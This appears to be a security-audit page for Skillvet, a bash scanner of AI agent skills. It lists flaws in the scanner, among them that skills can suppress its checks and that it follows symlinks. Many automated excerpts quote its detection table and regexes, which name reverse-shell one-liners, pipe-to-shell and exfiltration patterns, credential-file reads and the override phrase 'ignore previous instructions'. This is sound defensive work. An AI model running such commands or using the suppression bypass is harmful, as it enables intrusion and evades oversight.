Back to skill

Security audit

Skillvet

Security checks for vulnerabilities and agentic risk

Overview

This is a legitimate-looking skill security scanner, but its own implementation has several safety-boundary weaknesses that users should review before relying on it.

Install only if you treat it as an advisory scanner, not a complete security gate. Avoid using `safe-install.sh` on untrusted or path-like slugs, do not rely on clean results from packages that can provide their own suppressions, and run scans in a low-privilege sandbox with no access to secrets or unrelated home/workspace files.

Vulnerability Patterns
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (4)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/skill-audit.sh:142
Finding

Target-Controlled Suppression Can Disable All Security Checks

Content
View full analysis
/dev/null)" # trim whitespace [ -z "$rc_line" ] && continue case "$rc_line" in disable:*) DISABLED_CHECKS+="${rc_line#disable:} " ;; esac done < "$SKILLVETRC" fi is_check_disabled() { local check_num="$1" [[ " $DISABLED_CHECKS " == *" $check_num "* ]] } ``` Checks are then conditionally skipped: ```bash if ! is_check_disabled 2; then CHECKS_RUN=$((CHECKS_RUN + 1)) # ... fi ``` The same trust-boundary problem exists for inline suppression. Any matching line containing `skillvet-ignore` is ignored: ```bash has_ignore_comment() { local content="$1" echo "$content" | grep -q 'skillvet-ignore' } add_finding() { local severity="$1" file="$2" line="$3" desc="$4" check_id="${5:-}" weight=0 # ... } ``` Numerous critical-check loops call: ```bash has_ignore_comment "$content" && continue ``` Because both suppression mechanisms reside inside the untrusted artifact, a malicious skill can disable the controls intended to detect it. This directly contradicts the advertised behavior that critical findings are automatically blocked and removed. ### Attack Path 1. An attacker publishes a malicious skill containing credential theft, remote execution, or persistence logic. 2. The package also ...[truncated 1092 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Error
Location
scripts/skill-audit.sh:15
Finding

Missing Encoded Signature Database Causes Fail-Open Detection Degradation

Content
View full analysis
/dev/null | cut -d: -f2 | base64 -d 2>/dev/null fi } ``` The project directory contains no `scripts/patterns.b64`. As a result, all loaded variables are empty and the scanner silently substitutes narrow fallback expressions: ```bash [ -z "$P_REVSHELL" ] && P_REVSHELL='(mkfifo|ncat\s)' [ -z "$P_EXFIL_CURL" ] && P_EXFIL_CURL='(curl.*--data)' [ -z "$P_PIPE_SHELL" ] && P_PIPE_SHELL='(curl.*\|.*sh)' [ -z "$P_B64_EXEC" ] && P_B64_EXEC='(base64.*-d.*\|.*sh)' [ -z "$P_SUBPROCESS_NET" ] && P_SUBPROCESS_NET='(os\.system.*curl)' [ -z "$P_GATEKEEPER" ] && P_GATEKEEPER='(xattr.*curl)' [ -z "$P_CLICKFIX" ] && P_CLICKFIX='(chmod.*&&.*\.\/)' [ -z "$P_SUS_PKG" ] && P_SUS_PKG='(npm.*--registry)' [ -z "$P_KNOWN_IPS" ] && P_KNOWN_IPS='(0\.0\.0\.0)' [ -z "$P_EXFIL_ENDPOINTS" ] && P_EXFIL_ENDPOINTS='(webhook\.site|ngrok\.io)' [ -z "$P_BAD_ACTORS" ] && P_BAD_ACTORS='(zaycv|Ddoy233)' [ -z "$P_FAKE_UPDATE" ] && P_FAKE_UPDATE='(apple software update|microsoft update)' [ -z "$P_DEVTCP_SHELL" ] && P_DEVTCP_SHELL='(/dev/tcp/)' [ -z "$P_NOHUP_NET" ] && P_NOHUP_NET='(nohup.*curl)' [ -z "$P_PY_REVSHELL" ] && P_PY_REVSHELL='(socket\.socket.*connect.*dup2)' [ -z "$P_TMPDIR_STAGE" ] && P_TMPDIR_STAGE='(\$TMPDIR/[a-z])' [ -z "$P_GITHUB_RAW" ] && P_GITHUB_RAW='(raw\.githubusercontent)' [ -z "$P_ECHO_B64" ] && P_ECHO_B64='(echo.*base64)' ``` These expressions do not provide equivalent coverage. For example, the fallback exfiltration signature only detects `curl` with `--data`, ...[truncated 1670 chars]
Remediation
View remediation

T05 · Unauthorized Access and Privilege Escalation

Warning
Location
scripts/skill-audit.sh:284
Finding

Symlink Following Allows Scans to Escape the Requested Skill Directory

Content
View full analysis
/dev/null; then FIND_DEPTH_ARG="-maxdepth $MAX_DEPTH" fi # Use -L to follow symlinks # shellcheck disable=SC2086 FILES=$(find -L "$SKILL_DIR" $FIND_DEPTH_ARG -type f \( \ -name "*.md" -o -name "*.js" -o -name "*.ts" -o -name "*.tsx" -o -name "*.jsx" \ -o -name "*.py" -o -name "*.sh" -o -name "*.bash" \ -o -name "*.rs" -o -name "*.go" -o -name "*.rb" -o -name "*.c" -o -name "*.cpp" \ -o -name "*.json" -o -name "*.yaml" -o -name "*.yml" -o -name "*.toml" \ -o -name "*.txt" -o -name "*.env*" -o -name "Dockerfile*" -o -name "Makefile" \ -o -name "pom.xml" -o -name "*.gradle" \ \) 2>/dev/null || true) ``` The same `find -L` behavior is repeated in several security checks, including Unicode checks, shipped `.env` discovery, data-flow analysis, persistence analysis, and minified-file analysis. A symlink contained in an untrusted skill can point to a file or directory outside `SKILL_DIR`. `find -L` resolves and traverses that target with the scanner process's permissions. No canonical-path containment check verifies that discovered files remain beneath the audited root. This exceeds the minimum filesystem privileges needed for static analysis of a skill. The scanner should read the package being audited, not arbitrary locations selected by that package. ### Attack Path 1. An attacker places a symlink in a skill package that targets a readable host directory or a large filesystem tree. 2. A user or CI job runs `skill-audit.sh` against the package. 3. `find -L` follows the attacker-selected link outside the skill directory. 4. The scanner opens and analyzes matching files under the external ...[truncated 1101 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/safe-install.sh:9
Finding

Unvalidated Skill Slug Can Influence a Recursive Deletion Path

Content
View full analysis
[clawdhub args...]}" shift SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" # Detect workspace: CLAWDHUB_WORKDIR > git root > cwd if [ -n "${CLAWDHUB_WORKDIR:-}" ]; then WORKDIR="$CLAWDHUB_WORKDIR" elif git rev-parse --show-toplevel &>/dev/null; then WORKDIR="$(git rev-parse --show-toplevel)" else WORKDIR="$(pwd)" fi SKILL_DIR="$WORKDIR/skills/$SLUG" echo "📦 Installing $SLUG..." OUTPUT=$(cd "$WORKDIR" && clawdhub install "$SLUG" "$@" 2>&1) INSTALL_EXIT=$? ``` If the audit reports a critical result, the constructed path is recursively deleted: ```bash if [ $AUDIT_EXIT -eq 2 ]; then echo "" echo "⛔ CRITICAL issues found — removing $SLUG" rm -rf "$SKILL_DIR" echo "🗑️ Removed $SKILL_DIR" echo "" echo "If you've reviewed the skill and trust it, install manually:" echo " clawdhub install $SLUG" exit 2 ``` Shell quoting prevents word splitting and command substitution, but it does not prevent path traversal. A slug containing path separators or `..` components can cause the lexical path to resolve outside `$WORKDIR/skills`. Exploitation depends on the external `clawdhub install` command accepting the supplied slug and returning success. The local script nevertheless establishes no safety invariant of its own before performing `rm -rf`, so it should not rely on undocumented validation by another executable. ### Attack Path 1. An attacker or unsafe automation supplies a path-bearing slug containing traversal components. 2. The same value is passed to `clawdhub install`. 3. If the external CLI accepts it and returns success, `safe-install.sh` audits the path de ...[truncated 753 chars]
Remediation
View remediation
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • YARA SignaturesMalware Match, Webshell Match, Cryptominer Match
Findings (41)

YARA rule 'agent_skill_credential_exfiltration_webhook': AI agent skill credential harvesting followed by webhook or external exfiltration [agent_skills]

Critical
Category
YARA Match
Confidence
85% confidence
Finding

YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).

Content

Scanner excerpt · SKILL.md (reported line 124)May include surrounding context.

md
persistence + network, ClickFix, base64 execution
- **7-8**: Credential theft, obfuscation, path traversal, time bombs
- **4-6**: Punycode, homographs, ANSI injection, shortened URLs
- **2-3**: Subprocess execution, network requests, file writes

## Critical Checks (auto-blocked)

### Core Security Checks (1-24)

| # | Check | Example |
|---|-------|---------|
| 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin |
| 2 | Bulk env variable harvesting | `printenv \|`, `${!*@}` |
| 3 | Foreign credential access | ANTHROPIC_API_KEY, TELEGRAM_BOT_TOKEN in scripts |
| 4 | Code obfuscation | base64 decode, hex escapes, dynamic code generation |
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previ

YARA rule 'agent_skill_prompt_injection_hidden_instructions': Prompt injection or hidden instructions embedded in AI agent skill text [agent_skills]

High
Category
YARA Match
Confidence
80% confidence
Finding

YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

Content

Scanner excerpt · SKILL.md (reported line 3)May include surrounding context.

md
ion: "Security scanner for ClawHub/community skills — detects malware, credential theft, exfiltration, prompt injection, obfuscation, homograph attacks, ANSI injection, campaign-specific attack patterns, and more before you install. Use when installing skills from ClawHub or any public marketplace, reviewing third-party agent skills for safety, or vetting untrusted code before giving it to your AI agent. Triggers: install skill, audit skill, check skill, vet skill, skill security, safe install, is this skill safe."
compatibility: "Requires bash, grep, find, and file (standard POSIX). safe-install.sh and scan-remote.sh require the clawdhub CLI. perl or ggrep (Homebrew GNU grep) recommended for full Unicode regex support on macOS."
metadata:
  version: "2.0.9"
  author: oakencore
---

# Skillvet

Security scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from [Koi Secu

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · SKILL.md (reported line 131)May include surrounding context.

md
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · SKILL.md (reported line 138)May include surrounding context.

md
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 195)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 202)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 451)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 454)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 460)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 544)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 547)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 552)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · tests/run-tests.sh (reported line 139)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · tests/run-tests.sh (reported line 181)May include surrounding context.

sh
| 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` |
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |

Instruction Override

High
Category
Prompt Injection
Confidence
80% confidence
Finding

This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Content

Scanner excerpt · SKILL.md (reported line 132)May include surrounding context.

md
| 6 | Data exfiltration via curl/wget | `curl --data`, `wget --post` with variables |
| 7 | Reverse/bind shells | `/dev/tcp/`, `nc -e`, `socat` |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |
| 12 | Unicode obfuscation | Zero-width chars, RTL override, bidi control chars |

External Script Fetching

High
Category
Supply Chain
Confidence
90% confidence
Finding

Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Content

Scanner excerpt · SKILL.md (reported line 144)May include surrounding context.

md
| 18 | Punycode domains *(Tirith)* | `xn--` prefixed IDN-encoded domains |
| 19 | Double-encoded paths *(Tirith)* | `%25XX` percent-encoding bypass |
| 20 | Shortened URLs *(Tirith)* | bit.ly, t.co, tinyurl.com hiding destinations |
| 21 | Pipe-to-shell | `curl \| bash` (HTTP and HTTPS) |
| 22 | String construction evasion | String.fromCharCode, getattr, dynamic call assembly |
| 23 | Data flow chain analysis | Same file reads secrets, encodes, AND sends network requests |
| 24 | Time bomb detection | `Date.now() > timestamp`, `setTimeout(fn, 86400000)` |

YARA rule 'agent_skill_remote_bootstrap_execution': Remote script or code download followed by execution/bootstrap installation [agent_skills]

High
Category
YARA Match
Confidence
85% confidence
Finding

YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).

Content

Scanner excerpt · SKILL.md (reported line 159)May include surrounding context.

md
+ network | `nohup curl ... &` — backdoor with network access |
| 33 | Fake prerequisite pattern | "Prerequisites" section with sketchy external downloads |
| 34 | xattr/chmod dropper | macOS Gatekeeper bypass: download, `xattr -c`, `chmod +x`, execute |
| 35 | ClickFix download+execute chain | `curl -o /tmp/x && chmod +x && ./x`, `open -a` with downloads |
| 36 | Suspicious package sources | `pip install git+https://...`, npm from non-official registries |
| 37 | Staged installer pattern | Fake dependency names like `openclaw-core`, `some-lib` |
| 38 | Fake OS update social engineering | "Apple Software Update required for compatibility" |
| 39 | Known malicious ClawHub actors | zaycv, Ddoy233, Sakaen736jih, Hightower6eu references |
| 40 | Bash /dev/tcp reverse shell | `bash -i >/dev/tcp/IP/PORT 0>&1` (AuthTool pattern) |
| 41 | Nohup backdoor | `nohup bash -c '...' >/dev/null` with network commands |
| 42 | Python reverse shell | `socket.connect` + `dup2`, `pty.spawn('/bin/bash')

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · SKILL.md (reported line 167)May include surrounding context.

md
| 41 | Nohup backdoor | `nohup bash -c '...' >/dev/null` with network commands |
| 42 | Python reverse shell | `socket.connect` + `dup2`, `pty.spawn('/bin/bash')` |
| 43 | Terminal output disguise | Decoy "downloading..." message before malicious payload |
| 44 | Credential file access | Direct reads of `.env`, `.pem`, `.aws/credentials` |
| 45 | TMPDIR payload staging | AMOS pattern: drop malware to `$TMPDIR` then execute |
| 46 | GitHub raw content execution | `curl raw.githubusercontent.com/... \| bash` |
| 47 | Echo-encoded payloads | Long base64 strings echoed and piped to decoders |

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
60% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · SKILL.md (reported line 182)May include surrounding context.

md
| W3 | Network requests | axios, fetch, requests imports |
| W4 | Minified/bundled files | First line >500 chars — can't audit |
| W5 | Filesystem write operations | writeFile, open('w'), fs.append |
| W6 | Insecure transport | `curl -k`, `verify=False` — TLS disabled |
| W7 | Docker untrusted registries | Non-standard image sources |

## Scanned File Types

Ae1

High
Category
analysis-evasion
Confidence
100% confidence
Finding

Referenced artifact was not completely inspected

Content

Scanner excerpt · SKILL.md (reported line 214)May include surrounding context.

md
run: bash scripts/skill-audit.sh --sarif skills/some-skill > results.sarif || true

Credential Access

High
Category
Privilege Escalation
Confidence
70% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 190)May include surrounding context.

sh
declare -A REMEDIATION=(
  [1]="Remove references to known exfiltration services. Use legitimate API endpoints instead."
  [2]="Do not bulk-harvest environment variables. Access only specific variables you need."
  [3]="Do not access credentials belonging to the host agent or platform. Declare needed keys in SKILL.md."
  [4]="Remove eval/Function constructors and base64/hex obfuscation. Write readable code."
  [5]="Do not access files outside the skill directory. Remove path traversal patterns."
  [6]="Do not send environment data or file contents to external servers via curl/wget."

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 229)May include surrounding context.

sh
[50]="Remove zero-width and bidi override Unicode characters. These hide malicious content in plain sight."
  [51]="Replace punycode (xn--) domains with standard ASCII domains or explain their legitimate use."
  [52]="Remove credentials from URLs. Use environment variables or config files for authentication."
  [53]="Do not write to dotfiles (.bashrc, .ssh/authorized_keys, .gitconfig). Declare config requirements in SKILL.md."
  [54]="Replace shortened URLs with full destination URLs so the target can be verified."
)

YARA rule 'offensive_tool_references': References to well-known offensive security tools [hacktools]

High
Category
YARA Match
Confidence
70% confidence
Finding

YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 352)May include surrounding context.

sh
HECKS ---

# 1. Known exfiltration endpoints
if ! is_check_disabled 1; then
  CHECKS_RUN=$((CHECKS_RUN + 1))
  verbose "Running check #1: Exfiltration endpoints"
  while IFS=: read -r file line content; do
    [ -z "$file" ] && continue
    has_ignore_comment "$content" && continue
    rel_file="${file#$SKILL_DIR/}"
    if echo "$content" | grep -qiE '(webhook\.site|ngrok\.io|pipedream|requestbin|burpcollaborator|interact\.sh|oastify|socifiapp\.com|hookbin\.com|postb\.in|webhook\.online)'; then
      add_finding "CRITICAL" "$rel_file" "$line" "Known exfiltration endpoint: $(echo "$content" | grep -oiE '(webhook\.site|ngrok\.io|pipedream|requestbin|burpcollaborator|interact\.sh|oastify|socifiapp\.com|hookbin\.com|postb\.in|webhook\.online)[^ "]*')" "1"
    fi
  # shellcheck disable=SC2086
  done < <(grep -rnE 'https?://' "$SKILL_DIR" $CODE_INCLUDES 2>/dev/null || true)
fi

# 2. Environment variable harvesting
if ! is_check_disabled 2; then
  CHECKS_RUN=$((CHECKS_RUN + 1))
  verbose "Run

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 422)May include surrounding context.

sh
rel_file="${file#$SKILL_DIR/}"
    add_finding "CRITICAL" "$rel_file" "$line" "Path traversal / sensitive file access: ${content:0:120}" "5"
  # shellcheck disable=SC2086
  done < <(grep -rnE '(\.\./\.\./|/etc/passwd|/etc/shadow|~\/\.bashrc|~\/\.ssh|~\/\.aws|~\/\.clawdbot|~\/\.config|\/home\/[a-z])' "$SKILL_DIR" $CODE_INCLUDES 2>/dev/null || true)
fi

# 6. Data exfiltration via curl/wget (ENCODED)

Credential Access

High
Category
Privilege Escalation
Confidence
95% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/skill-audit.sh (reported line 422)May include surrounding context.

sh
rel_file="${file#$SKILL_DIR/}"
    add_finding "CRITICAL" "$rel_file" "$line" "Path traversal / sensitive file access: ${content:0:120}" "5"
  # shellcheck disable=SC2086
  done < <(grep -rnE '(\.\./\.\./|/etc/passwd|/etc/shadow|~\/\.bashrc|~\/\.ssh|~\/\.aws|~\/\.clawdbot|~\/\.config|\/home\/[a-z])' "$SKILL_DIR" $CODE_INCLUDES 2>/dev/null || true)
fi

# 6. Data exfiltration via curl/wget (ENCODED)